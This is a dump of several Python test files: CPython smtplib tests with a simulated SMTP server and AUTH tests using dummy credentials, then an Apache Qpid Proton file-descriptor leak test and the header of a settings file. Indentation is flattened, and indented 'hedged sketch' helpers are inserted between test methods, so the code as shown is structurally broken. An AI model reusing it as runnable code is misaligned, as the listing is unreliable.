m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object; each should
# raise SMTPServerDisconnected ('sock' is not yet set, and smtplib
# reports that as a disconnected server rather than letting an
# AttributeError escape from SMTP.send)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
'authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
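# Hedged client-side sketch (assumption: this mirrors what smtplib sends and
# what `_auth_cram_md5` above verifies): HMAC-MD5 the decoded challenge with
# the password, hex-encode the digest, prefix the username, and base64 the
# resulting "user digest" string.
def _client_cram_md5_response(user, password, b64_challenge):
    challenge = base64.decodebytes(b64_challenge.encode('ascii'))
    digest = hmac.HMAC(password.encode('ascii'), challenge, 'md5').hexdigest()
    response = '%s %s' % (user, digest)
    return encode_base64(response.encode('ascii'), eol='')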
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
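# Hedged sketch (a simplified stand-in for how smtplib.ehlo() derives
# esmtp_features from the multiline 250 reply produced by smtp_EHLO above;
# the real parser is regex-based):
def _parse_ehlo_features(resp_text):
    features = {}
    for line in resp_text.split('\r\n')[1:]:  # first line is the domain
        body = line[4:]  # strip the "250-" / "250 " prefix
        name, _, params = body.partition(' ')
        features[name.lower()] = params
    return features
# _parse_ehlo_features('250-testhost\r\n250-SIZE 20000000\r\n250 HELP')
# == {'size': '20000000', 'help': ''}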
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
# TODO: add tests for correct AUTH method fallback now that the
# test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received \r\n to \n, so we can't easily test that
# we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
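# Hedged client-side sketch (assumption): smtplib builds the same token by
# base64-encoding "\0<user>\0<password>", which the channel below compares
# against EXPECTED_RESPONSE.
def _client_auth_plain_initial_response(user, password):
    token = '\0%s\0%s' % (user, password)
    return encode_base64(token.encode('ascii'), eol='')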
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does support an initial-response, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
test_PROTON_1800_syncrequestresponse_fd_leak.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
PROTON-1800 BlockingConnection descriptor leak
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import socket
import uuid
import gc
import os
import threading
import subprocess
from collections import namedtuple
import cproton
import proton
import proton.reactor
from proton import Message
from proton.utils import SyncRequestResponse, BlockingConnection
from proton.handlers import IncomingMessageHandler
from test_unittest import unittest
def count_fds():
# type: () -> int
return len(os.listdir('/proc/self/fd/'))
@contextlib.contextmanager
def no_fd_leaks(test):
# type: (unittest.TestCase) -> None
before = count_fds()
yield
delta = count_fds() - before
if delta != 0:
subprocess.check_call("ls -lF /proc/{0}/fd/".format(os.getpid()), shell=True)
test.assertEqual(0, delta, "Found {0} new fd(s) after the test".format(delta))
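# A minimal usage sketch for no_fd_leaks (hypothetical test, illustration
# only):
#
#   class ExampleTest(unittest.TestCase):
#       def test_socket_is_closed(self):
#           with no_fd_leaks(self):
#               s = socket.socket()
#               s.close()  # leaving this socket open would fail the check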
class Broker(proton.handlers.MessagingHandler):
def __init__(self, acceptor_url):
# type: (str) -> None
super(Broker, self).__init__()
self.acceptor_url = acceptor_url
self.sender = None
self.acceptor = None
self._acceptor_opened_event = threading.Event()
def get_acceptor_sockname(self):
# type: () -> (str, int)
self._acceptor_opened_event.wait()
if hasattr(self.acceptor, '_selectable'): # proton 0.30.0+
sockname = self.acceptor._selectable._delegate.getsockname()
else: # works in proton 0.27.0
selectable = cproton.pn_cast_pn_selectable(self.acceptor._impl)
fd = cproton.pn_selectable_get_fd(selectable)
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
sockname = s.getsockname()
return sockname[:2]
def on_start(self, event):
self.acceptor = event.container.listen(self.acceptor_url)
self._acceptor_opened_event.set()
def on_link_opening(self, event):
if event.link.is_sender:
assert event.link.remote_source.dynamic
address = str(uuid.uuid4())
event.link.source.address = address
self.sender = event.link
elif event.link.remote_target.address:
event.link.target.address = event.link.remote_target.address
def on_message(self, event):
message = event.message
assert self.sender.source.address == message.reply_to
reply = proton.Message(body=message.body.upper(), correlation_id=message.correlation_id)
self.sender.send(reply)
@contextlib.contextmanager
def test_broker():
broker = Broker('localhost:0')
container = proton.reactor.Container(broker)
threading.Thread(target=container.run).start()
yield broker
container.stop()
PROC_SELF_FD_EXISTS = os.path.exists("/proc/self/fd"), "Skipped: Directory /proc/self/fd does not exist"
class Proton1800Test(unittest.TestCase):
@unittest.skipUnless(*PROC_SELF_FD_EXISTS)
def test_sync_request_response_blocking_connection_no_object_leaks(self):
with test_broker() as tb:
sockname = tb.get_acceptor_sockname()
url = "{0}:{1}".format(*sockname)
opts = namedtuple('Opts', ['address', 'timeout'])(address=url, timeout=3)
with no_fd_leaks(self):
client = SyncRequestResponse(
BlockingConnection(url, opts.timeout, allowed_mechs="ANONYMOUS"), "somequeue")
try:
request = "One Two Three Four"
response = client.call(Message(body=request))
finally:
client.connection.close()
gc.collect()
|
settings.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
